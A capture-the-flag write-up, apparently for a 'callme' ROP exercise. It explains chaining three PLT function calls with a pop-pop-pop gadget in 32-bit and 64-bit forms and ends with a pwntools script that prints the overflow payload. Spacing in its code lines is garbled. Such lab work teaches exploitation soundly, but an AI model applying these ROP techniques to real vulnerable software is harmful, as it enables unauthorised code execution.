So we have all the three required function calls, but in reverse order, and with different parameters, so calling this function won't get use the flag we are looking for, but we have function calls available to us in the PLT, which is good.
So we'll have to build a ROP chain to call these three functions, in the right order (one, two, three) and with right parameters (1, 2, 3).
32 bit
So we have the PLT addresses available for the three function calls.
So now we have to find a way to jump pass the 3 parameters and call the other function once the first function is done execution. In this case I found a ROP gadget that pops the value from stack into 3 different registers and then returns back to the stack.
0x080488a9:popesi ; popedi ; popebp ; ret
So now our exploit will look something like this.
JUNK+call_one+ROP_GADGET+1+2+3+call_two>Repeat
So let's construct the exploit and get our flag. Note:
So due to change in how parameters are passed to x64 architecture systems, we'll have to alter our exploit generation process. Now our exploit will look something like this
So in x64 parameters are loaded in this order, RDI, RSI, RDX, and so on. Apparently we were able to find a gadget that just that did.
0x0000000000401ab0:poprdi ; poprsi ; poprdx ; ret
And the PLT addresses for the functions were available from the disassembly of the usefulFunction.
0x401850-ONE0x401870-TWO0x401810-THREE
So now let's construct our final exploit and get the flag.
from pwn import*offset ="A"*40one =p64(0x401ab0)+p64(1)+p64(2)+p64(3)+p64(0x401850)two =p64(0x401ab0)+p64(1)+p64(2)+p64(3)+p64(0x401870)three =p64(0x401ab0)+p64(1)+p64(2)+p64(3)+p64(0x401810)print offset + one + two + three